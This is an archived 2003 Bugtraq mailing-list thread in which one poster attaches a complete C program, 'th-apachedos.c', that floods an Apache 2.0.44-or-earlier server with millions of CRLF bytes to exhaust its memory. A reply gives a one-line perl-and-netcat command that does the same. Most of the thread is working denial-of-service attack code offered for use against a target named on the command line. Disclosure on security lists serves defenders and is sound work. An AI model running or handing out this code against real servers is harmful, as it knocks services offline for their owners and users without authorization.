98440 2003-04-11 01:25 /9 rader/ Daniel Nystr=?UTF-8?Q?=C3=B6m?= <daniel-nystrom@tyko.nu>
Importerad: 2003-04-11 01:25 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4450>
Ärende: working apache <= 2.0.44 DoS exploit for linux.
------------------------------------------------------------
Exploit attached.
No replys to this e-mail adress plz.
(98440) /Daniel Nystr=?UTF-8?Q?=C3=B6m?= <daniel-nystrom@tyko.nu>/
Bilaga (text/plain) i text 98441
Kommentar i text 98624 av Paul Johnston <paul@westpoint.ltd.uk>
98441 2003-04-11 01:25 /109 rader/ Daniel Nystr=?UTF-8?Q?=C3=B6m?= <daniel-nystrom@tyko.nu>
Bilagans filnamn: "th-apachedos.c"
Importerad: 2003-04-11 01:25 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4451>
Bilaga (text/plain) till text 98440
Ärende: Bilaga (th-apachedos.c) till: working apache <= 2.0.44 DoS exploit for linux.
------------------------------------------------------------
/* Version 2 */
/******** th-apachedos.c ********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
* *
* iDEFENSE Security Advisory 04.08.03: *
* http://www.idefense.com/advisory/04.08.03.txt *
* Denial of Service in Apache HTTP Server 2.x *
* April 8, 2003 *
* *
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
* *
* *
* Daniel Nyström <exce@netwinder.nu> *
* *
* - www.telhack.tk - *
* *
******************************************************** th-apachedos.c ********/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;
if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]);
exit(-1);
}
printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-> Starting...\n");
printf("->\n");
// memset(buffer, '\n', sizeof(buffer)); /* testing */
for (count = 0; count < 8000000;)
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}
memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he->h_addr);
printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("->\n");
if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}
if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
{
perror("connect() failed ");
exit(-1);
}
printf("-> Connected to %s:%d... Sending linefeeds...\n",
inet_ntoa(target.sin_addr), atoi(argv[2])); printf("->\n");
if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
}
close(sockfd);
printf("-> Finished smoothly, check hosts apache...\n\n");
}
/* EOF - th-apachedos.c
* http://www.telhack.tk
*/
(98441) /Daniel Nystr=?UTF-8?Q?=C3=B6m?= <daniel-nystrom@tyko.nu>/(Ombruten)
98624 2003-04-12 22:54 /28 rader/ Paul Johnston <paul@westpoint.ltd.uk>
Importerad: 2003-04-12 22:54 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4488>
Kommentar till text 98440 av Daniel Nystr=?UTF-8?Q?=C3=B6m?= <daniel-nystrom@tyko.nu>
Ärende: Re: working apache <= 2.0.44 DoS exploit for linux.
------------------------------------------------------------
The exploit is trivial with perl and netcat:
perl -e 'print "\r\n" x 4000000' | nc <target> 80
Daniel Nyström wrote:
>Exploit attached.
>
>No replys to this e-mail adress plz.
>
>
>
--
Paul Johnston
Internet Security Specialist
Westpoint Limited
Albion Wharf, 19 Albion Street,
Manchester, M1 5LN
England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: paul@westpoint.ltd.uk
web: www.westpoint.ltd.uk
(98624) /Paul Johnston <paul@westpoint.ltd.uk>/-----